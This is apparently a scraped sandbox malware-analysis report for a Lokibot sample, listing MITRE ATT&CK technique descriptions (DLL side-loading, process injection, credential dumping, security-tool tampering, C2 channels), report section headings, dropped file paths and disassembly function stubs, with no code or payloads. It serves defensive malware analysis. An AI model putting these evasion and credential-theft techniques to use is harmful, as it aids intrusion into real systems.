Opcode ID: 97c05e97c8173f6be26ae818b5776147fb3e9d7db23be9392c32e12bab91489d
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 97c05e97c8173f6be26ae818b5776147fb3e9d7db23be9392c32e12bab91489d
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lqoUUYTMsL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\lqoUUYTMsL.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
lqoUUYTMsL.exe

Function 018B7DD0 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Function 018B7E10 Relevance: 6.5, Strings: 5, Instructions: 206
COMMON

Function 018B8DDC Relevance: 3.9, Strings: 3, Instructions: 139
COMMON

Function 018B8DF8 Relevance: 3.9, Strings: 3, Instructions: 131
COMMON

Function 018B4A0B Relevance: 2.8, Strings: 2, Instructions: 280
COMMON

Function 018B4A40 Relevance: 2.8, Strings: 2, Instructions: 264
COMMON

Function 012DA97F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Function 056A1A13 Relevance: 3.8, Strings: 3, Instructions: 49
COMMON

Function 056A150A Relevance: 2.5, Strings: 2, Instructions: 26
COMMON